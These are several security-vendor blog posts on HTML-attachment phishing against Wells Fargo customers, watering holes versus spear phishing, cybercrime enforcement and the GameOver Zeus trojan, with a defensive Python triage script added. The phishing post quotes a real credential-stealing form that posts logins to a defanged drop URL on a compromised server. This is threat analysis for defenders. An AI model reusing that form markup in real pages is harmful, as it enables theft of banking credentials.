HTML Attachment Phishing: What You Need to Know

Are you aware of HTML attachment phishing? It is one of the latest trends among cybercriminals. Instead of emailing downloaders that contact C2 servers to fetch crypto-malware, Trojans, or other nasties, attackers are sending HTML attachments. HTML attachment phishing is less well known, and as a result, many people are falling for these phishing scams.

Even though this past weekend was a holiday weekend for many, there is a good chance that you still checked your email fairly often. If you are like me, you typically use your phone or another mobile device to check your email on the go. This past weekend, you were probably multitasking and may not have been on high-alert for a fraudulent message while you were checking email in between hiding and finding Easter eggs.

Hackers know these things.

So, they send crafty messages like this one (shown as opened in the Thunderbird email client):

If you open that message on your phone, the attachment would probably download with the message, and all you have to do is click to view it. This is a little different than your typical phishing message; a typical phishing message contains a button that has an embedded link that takes you to a lookalike of your bank’s or another online service provider’s real web site.

In today’s example, the phishing page has been stored as a file that looks like the following in a desktop browser:

It will also load up in your phone’s browser, but Safari (or another browser) on your phone may just show you a truncated version of the Internet address you are visiting. When it is a local file, you may just see a portion of the name of the file, Wells_Fargo-Personal-Business_Banking.htm as on my iPhone below:

So, what can Wells Fargo do about that? You may think there is no phishing content to be taken down or removed because it seems encapsulated in the email message. You may think that nobody is harmed if you don’t reply or fall for logging in this way. However, some folks WILL reply, and there is fraudulent content on the Internet that can be referred by Wells Fargo to their takedown provider.

In the source code of the HTML attachment are instructions for how to handle the credentials that the victim enters. Below is a snippet of the code from this phishing attack:

<form id="frmSignon" action="hxxp://gospelvideo.com.br/wp-includes/images/smilies/zate.php" autocomplete="off" method="post" name="signon">

The action attribute is the path to a PHP script on a compromised server in Portugal that hosts a domain belonging to a Brazilian gospel video web site. Undoubtedly, if we could view the source code of that PHP script, we would see that it contains the email address of the criminal who is receiving the stolen Wells Fargo credentials. Wells Fargo wants to remove this fraudulent content before its customers can be victimized.

When we visit that page, we see that the PHP code redirects victims to what we call the “exit URL” which is a legitimate login page at Wells Fargo. The victim will then think that their login failed, and they will try to log in again. It is at that moment that Wells Fargo can recognize that customers who login there—having been referred from the gospelvideo.com.br URL—are customers who likely just gave up their authentication credentials and should have their accounts locked until the situation is rectified.
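The two steps described above, extracting the credential drop-point from the attachment and then spotting logins that arrive from it, can be scripted. The block below is an added example written for this post, not PhishMe's or Wells Fargo's code. It parses a constructed HTML attachment modelled on the form snippet quoted above, reports any form that posts a password field to a host outside the brand's own domains (the brand domain list is an assumption), and then scans a few constructed Apache-style access-log lines for login-page hits whose Referer is one of those drop hosts. The defanged hxxp:// scheme is only re-armed for URL parsing; nothing is fetched.

```python
"""Added example: triage an HTML phishing attachment, then correlate the
credential drop host with login-page access logs (constructed sample data)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment modelled on the form quoted in the post.
SAMPLE_ATTACHMENT = """
<html><body>
<form id="frmSignon" action="hxxp://gospelvideo.com.br/wp-includes/images/smilies/zate.php"
      autocomplete="off" method="post" name="signon">
  <input type="text" name="userid">
  <input type="password" name="password">
  <input type="submit" value="Sign On">
</form>
</body></html>
"""

# Assumption: the spoofed brand's legitimate domains.
BRAND_DOMAINS = {"wellsfargo.com"}


class FormCollector(HTMLParser):
    """Collect every <form>, its action URL, and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def rearm(url):
    """Turn a defanged hxxp(s):// URL back into http(s):// for parsing only."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def credential_drop_hosts(html_text, brand_domains=BRAND_DOMAINS):
    """Hosts that receive password-form posts and are not owned by the brand."""
    parser = FormCollector()
    parser.feed(html_text)
    hosts = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        host = urlparse(rearm(form["action"])).hostname
        if host and not any(host == d or host.endswith("." + d) for d in brand_domains):
            hosts.append(host)
    return hosts


# Constructed access-log lines (Apache combined format); not real traffic.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [21/Apr/2014:10:01:02 -0500] "GET /login HTTP/1.1" 200 512 "http://gospelvideo.com.br/wp-includes/images/smilies/zate.php" "Mozilla/5.0"
203.0.113.8 - - [21/Apr/2014:10:02:15 -0500] "GET /login HTTP/1.1" 200 512 "https://www.wellsfargo.com/" "Mozilla/5.0"
203.0.113.9 - - [21/Apr/2014:10:03:40 -0500] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def suspect_logins(log_text, drop_hosts):
    """(ip, timestamp) of login-page hits whose Referer is a known drop host."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("ref") == "-":
            continue
        ref_host = urlparse(m.group("ref")).hostname
        if ref_host in drop_hosts:
            hits.append((m.group("ip"), m.group("ts")))
    return hits


if __name__ == "__main__":
    hosts = credential_drop_hosts(SAMPLE_ATTACHMENT)
    print("credential drop hosts:", hosts)
    print("sessions to review/lock:", suspect_logins(SAMPLE_ACCESS_LOG, set(hosts)))
```

One caveat for the log side: whether the Referer header actually names the drop host depends on how the PHP script sends the victim on. A meta-refresh or JavaScript redirect makes the PHP page the referrer, whereas a plain HTTP 302 carries over the referrer of the original form submission, which for an attachment opened from local disk is empty. Treat an empty Referer on a login burst following a known campaign as a weaker signal rather than a clean one.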

PhishMe provides the intelligence that enables Wells Fargo and other spoofed brands to tackle this threat vector. Our PhishMe Intelligence system scans over two million spam messages daily to identify the messages that are delivering HTML attachments. Then we use our patented technology to automatically identify the file as a phishing attack and extract the relevant intelligence.

PhishMe digs deeper than other threat intelligence service providers to find the source of the attacks. Learn more about how we can help you protect your brand here.

Watering Holes vs. Spear Phishing

How Does A Watering Hole Attack Work?

Watering hole attacks begin by compromising trusted websites and infecting the computers or other devices that visit those sites. A successful watering hole attack casts a wide net and has the potential to compromise a large number of users across multiple organizations. This flood of information is a double-edged sword, as attackers have to parse through a large amount of data to find information of value. Additionally, these attacks often exploit zero-day vulnerabilities, so their increased popularity means attackers are burning through zero-days faster, and companies are responding faster as well, stopping attacks earlier in the kill chain.

These attacks are an effective tactic that, when executed properly, can deliver widespread damage on a large scale. Symantec released an excellent report describing the APT group “Hidden Lynx”, which the report describes as the inventors of the watering hole technique. The report details last year’s VOHO campaign, which targeted iOS developers and impacted users at Facebook, Apple, and Twitter – showing the power of watering hole attacks.

The Danger Of Indiscriminate Watering Hole Attacks

Instead of viewing indiscriminate watering-hole attacks as a replacement for spear phishing, they can be seen as an additional tool at adversaries’ disposal, which is what makes them so dangerous. Like all tools, spear phishing and watering hole attacks have specific strengths and weaknesses that suit them well for certain jobs while making them limited in other situations.

As described above, watering hole attacks gather huge amounts of data that attackers will have to sift through for useful information, thus slowing down their ability to take additional malicious action.

Spear phishing, on the other hand, offers attackers the ability to focus more on specific targets and information. A successful spear phishing attack provides immediate access to a target’s systems. Given the amount of readily available information on organizations and their employees on the Internet, attackers can easily identify targets and craft seemingly genuine emails that will provide gateways to specific systems and ultimately data. Spear phishing can exploit zero-days to drop malware on a host, but it doesn’t rely on vulnerabilities. Simple social engineering tactics have allowed groups such as the Syrian Electronic Army to carry out a multitude of high-profile attacks.


Anecdotal evidence continues to highlight spear phishing as the source of most high-profile breaches. As previously mentioned, spear phishing is the attack method of choice for the Syrian Electronic Army. Brian Krebs also reported that the Target breach started with a spear phishing email that unloaded malware and stole login credentials from Target vendor Fazio Mechanical.

The fact that news reports around watering hole attacks are stating “watering-hole usage” rather than “company x compromised by watering hole attack” indicates that either companies aren’t discussing successful campaigns, or that the attackers are still refining their tactics. Even if they are successful, the attackers may be inundated with information and are still deciding whether they have found anything useful.

There’s no denying that watering-hole attacks are making an impact, but the idea that it is replacing spear phishing is erroneous. While Symantec’s 2014 Internet Security Threat Report notes a decrease in the overall volume of spear phishing emails, the number of campaigns increased by 91%. Adversaries aren’t turning away from spear phishing as an attack method; instead they are sharpening the focus of their attacks. Symantec attributes this to growing user awareness (we’d like to take some credit for that), but it is probably also due to the dynamics discussed above.

For casting a wider net intended to compromise a large number of users, watering-hole attacks are an effective tactic, but for a highly focused attack seeking specific information, a well-crafted spear phish is still an adversary’s best weapon.

Cyber Chess: How You Can Win

Most of us are not very good at playing chess – if we play at all. However, many of us at least have some familiarity with the game. The following quick description will help in the discussion of Cyber Chess – the game the good guys (white pieces) “play” against the cybercriminals (black pieces) as they try to steal anything we value from our cyber world.

The chess game is described in three phases.

The Opening:  During the opening, you and your opponent make several moves to establish a battlefront.

The Middle Game:  The middle game is the direct battle zone. This phase is spent attacking, being attacked, defending and looking for ways to stabilize your defenses or cripple your opponent and break down his/her defenses.

The End Game: This is where the game comes to a conclusion when, excluding the occasional draw, you either win or you lose to your opponent, Checkmate!

Simple enough, right? And it is: all you have to do is checkmate your opponent – i.e., more or less capture their king. Of course, there are those who would argue that it is not that simple. They say you have to be really smart and know a lot! They point to the fact that for just the first four moves in a chess game, there are 318,979,564,000 possibilities. For the first ten moves, the number is 169,518,829,100,544,000,000,000,000,000. After that, the numbers start to get big, with the total possible moves in the neighborhood of 10^120, or 1 followed by 120 zeros – quite a big neighborhood! Hmmm, maybe they have a point.

Chess is a game of extremely big numbers of possible moves. Cybercrime is a “game” of very big numbers. Annually:

  • 26,280,000,000,000 malicious e-mails sent
  • 2,628,000,000,000 get through current defenses
  • 13,140,000,000 are effective

To be clear, Cyber Chess is not “a” game. It is thousands and millions of concurrent games rolled into a continuous stream of threats to which we must respond – in other words, we must “play.” So, the answer to the “Do You Play?” part of the title question is yes, you do play. You may not want to play, you may not know how to play, but like it or not, you are definitely in the game!

The Cyber Chess opening begins with criminals sending out nearly 75,000,000,000 malicious messages (spam, phishing, malware) every day. Your opening moves are probably to make sure your antivirus (AV) software is updated and that your various network devices are current with respect to known threats. Assessment of the opening game: Advantage Black.

The middle game plays out with your defenses blocking what they can and with the cybercriminals taking what they can get in terms of successfully getting into one or some of your users’ computers and then into your network. Using an industry average figure of 1 in 200 attacks being successful, and assuming your company has maybe 1000 users, that means that on average 5 of your users will fall victim to an attack that made its way past your defenses. Of course, all it takes is one successful compromise to allow the criminal to take up residence inside your network. Does this really happen that often considering the money companies spend on cyber defense? If you ask Target, Neiman Marcus, Franciscan Health, dozens of universities, and hundreds of other companies, it absolutely does happen! From the 2013 Verizon Data Breach Report:

  • There were more than 47,000 security incidents reported
  • Resulting in 621 data breaches
  • Email attacks were the primary mechanism to deploy malware into enterprises, either directly or indirectly (Figure 20, p. 29 of the report)
    • 67% of the time in large enterprises, email was the direct vector
    • Still more often, malicious email was the mechanism by which bad guys gained access to a computer and then directly installed malware on it
  • Of the 621 data breaches, how did companies find out? (p. 54 of the report)
    • Only 4% were detected by network IDS (Intrusion Detection Systems)
    • Only another 4% were detected by analyzing log files
    • Antivirus programs didn’t detect any of them!
    • Most companies learned about their data breach from an external source, for example customers or law enforcement. This happened 70% of the time. (p. 53 of the report)

It is also interesting to note that the average time between when a breach occurs and when a company detects it has been breached is about 210 days (Trustwave). That’s a long time that the criminal has to develop his or her “middle game,” solidifying their presence in your network and positioning for a win in the end game. Of course, they are taking your “pieces” all along the way.

Significant in all of this is that according to the Verizon report, none, zip, zilch, nada, of the breaches were detected by antivirus programs. That is truly comforting news – for the cybercriminal. Assessment of the middle game: Advantage Black.

The End Game. Unfortunately, there is no end to this game, at least not an end that anyone can foresee from the present state. For a long time, we will be forced to play the middle game in response to a continuous assault of opening moves by the bad guys. Can you play the game using yesterday’s tools and yesterday’s strategies and tactics? Absolutely you can! Can you win the game doing that? Absolutely you cannot!

Cybercriminals continuously evolve their tools and tactics to improve their success based on what they learn about their enemy, about us. Theirs is an intelligence-based approach, and when they see that something is not working, they make changes. Too many of us continue to put our faith in things that might have worked in the past, but that we know, in our minds and hearts, are no longer effective. Why is that so? For one thing, antivirus companies continue to sell the message that they protect us from bad things, and they do. The problem is that they do not protect us from the worst things, and even when they finally do, it often is too late. The other problem is that for such a long time, we have been conditioned to think in a compliance-based way: if we follow the rules and regulations, do what we have been doing, and use the updated versions of yesterday’s weapons, we will be okay.

The question to ask at this point is “How is that working for us?” Given that daily reports of breaches would fill several pages of the daily newspaper, the honest answer has to be “Not very well.” A casual review of the 2013 Verizon Data Breach Report already gives us the answer. The new question is “What can we do to get better at the game and have some hope of eventually winning?”

The new answer is that we must shift away from believing the well-intended but misguided idea that others can protect us with outmoded tools while we blissfully go about our business. We must realize that today’s solutions to today’s criminal attacks are found in actionable intelligence and proactive intervention.

What this means is that we must employ actionable cybersecurity intelligence and forensic analysis about email-based threats (phishing, spam and malware) that identify, prioritize and target cybercriminal activities and provide effective countermeasures. This includes the ability to identify the root sources of cybercrime attacks (servers, perpetrators, locations, etc.), obtaining rich actionable intelligence about cross-brand attacks and targeted attacks, as well as advance notification of emerging email-based threats. Only then will we be able to respond effectively to attacks on our brands, and to disrupt email-based threats against us. Only then will we be able to improve our game.

Cyber Chess – Do You Play? Yes, you don’t have a choice.

Can you win? Perhaps, but not by continuing to play yesterday’s game.

Assessment of the end game: It’s up to you. Your Move!

Why Do We Treat Cybercrime Differently than Real-Life Crime?

What would you do if you were the victim of a crime? For example, what if you walk out to your car after work and find the window smashed and the stereo stolen? Wouldn’t you call the police?

Imagine that, this weekend, you’re leaving a bar with some friends. A man walks up, points a gun at you and demands your wallet. You’d call the police, right?

Now pretend you receive an email saying that the bank needs you to reset your password. You go to the provided website in the email and the next time you check your balance there’s $500 missing. Who would you call?

The bank, right?

Our first inclination is to call the police when we’re the victims of crime in real life. Why do we treat cybercrime differently than any other type of crime?

When it comes to punishing cybercriminals, the biggest obstacle is that they’re usually too far away from their victims. Even if they’re caught, the court fees, travel expenses to the court, and lodging normally outweigh the amount stolen. It’s easier to just call the bank and try to get your money back. While this isn’t exactly “right”, it’s currently the easiest course of action when dealing with online theft.

Another problem is how the general populace treats cybercrime. When a victim’s front door is kicked in and their house robbed, we immediately blame the criminal. When your online banking information is stolen, we typically point the finger at the victim and scold them for not having the most up-to-date antivirus software or firewall.

In terms of reporting criminal activity, the government does have laws that say we should report every crime to the Department of Justice. Crimes like burglary, aggravated assault, and murder are measured. They do not measure cybercrime. There’s not even a box to check in regards to online theft on a police report.

So why are they not tracking that? Statistics say that there are 18 new victims of cybercrime every second. In 2012, nine million Americans fell victim to fake bank websites, 19 million Americans had money taken off their credit cards without authorization, and 43% of Americans are still experiencing heavy volumes of spam. These seem like pretty steep numbers to not take into account.

In order to change this, we need to embrace the idea that if we see something, we say something. When cybercrime happens, call the police. If they don’t respond the way you think they should, notify elected officials about the crime. Take the issue to congressmen, senators, governors, DAs and the Attorney General. It needs to be known that we want justice against these crimes, and it needs to start with the victim.

How do you think that we can improve enforcement around cybercrime? Share your comments below.

Learn more about this topic by watching Gary’s presentation at TEDx Birmingham here.

GameOver Zeus: Three Things You Should Know

The Zeus banking Trojan is a popular topic in the security world these days. It’s not new, but it still garners attention as one of the most successful and prolific Trojans in use today.

Banking Trojans hide on infected machines and intercept activity related to the user’s finances—bank account logins, investment information, even purchases on sites like eBay. This differs from phishing: with a banking Trojan like Zeus, the end user’s machine is infected, but they are not directed to a fake website and made to believe they are logging in to an official website.

Instead, he or she is interacting with the real banking, investing, or retail website and is completing a legitimate transaction. However, while that activity takes place, keystrokes are being logged. Screenshots may even be taken and transmitted to the attackers’ C&C server. Usernames, passwords, and security questions are all monitored, recorded, and transmitted to the attackers. All of these malicious actions occur silently. Once infected, there will be no sign that an Internet session is anything but private.

Since the 2010 leak of the Zeus source code, a host of Zeus variants has been unleashed on an unsuspecting public. Cybercriminals leaped at the opportunity to diversify both the traits and abilities of the Zeus Trojans, building their own variants. Some of those Zeus variants—such as Ice IX and Citadel—have garnered attention for their huge successes.

Perhaps the most successful Zeus variant to date, GameOver Zeus, was responsible for 38% of banking Trojan activity in 2013. In this post, we’ll explore three things that you need to know about GameOver Zeus.

#1: The difference between GameOver Zeus and other Zeus variants.

While other prominent Zeus variants – and their associated botnets – rely on centralized command and control infrastructure, GameOver uses a distributed peer-to-peer botnet. This means instructions can come from virtually any other infected machine. That is part of the reason for the success of the Trojan. Nailing down the all-important points of origin for these instructions is incredibly difficult, if not nearly impossible.

#2: GameOver Zeus is the most versatile Zeus Variant.

GameOver Zeus is the most versatile of the Zeus variants and enjoys the advantage of being distributed via email attachments and downloaders, or through URLs in emails that point to online exploit kits. Those same exploit kits are also used in drive-by attacks on the Web, and via malvertising that directs traffic to the sites. Regardless of the online medium, GameOver can utilize an attack vector to gain a foothold in your system.

Once a machine is infected, it can receive instructions to download even more malicious payloads: other malware that can perform a much wider range of malicious actions. PhishMe has observed the GameOver botnet distributing malware aimed at generating more malware-laden spam, stealing Bitcoin and other cryptocurrency wallets from an infected machine, as well as downloading CryptoLocker. CryptoLocker is ransomware that encrypts a wide range of files on the infected machine, rendering it unusable until a ransom payment is made. All photos, documents, databases, images, and other important files are locked with powerful, unbreakable encryption.

#3: Recent changes have made it more likely for Zeus to infect a machine on your network.

Last September, PhishMe saw GameOver’s distributors begin using the Upatre malware downloader—a downloader which served largely as a replacement for the more substantial Pony Loader that was largely abandoned following the fall of the Blackhole exploit kit.

Upatre capitalizes on leaving a smaller footprint and utilizes simple, yet effective encryption techniques to hide the GameOver infection process. This more sophisticated and nuanced approach makes less “noise” on infected systems and utilizes “throw-away” distribution resources. This variation in the way GameOver is distributed makes it much more difficult for the average user to avoid becoming infected with the Zeus Trojan, by reducing the likelihood that he or she will notice anything out of the ordinary is happening.

In just the past two months, the developers of GameOver Zeus have implemented additional functionality to make their malware more persistent and harder to detect. This includes the addition of rootkit functionality borrowed from the prominent Necurs rootkit to prevent removal of the malware. Steps are also taken to prevent any potential future botnet sinkhole attempts.

Cybercriminals are, and always have been, persistent, savvy, and dynamic. Their continued development of GameOver serves to underscore all three of those traits. However, this malware clearly shows that they are also successful.

How has GameOver Zeus affected your business? Tell us what else you think business leaders should know about GameOver Zeus in the comments section below.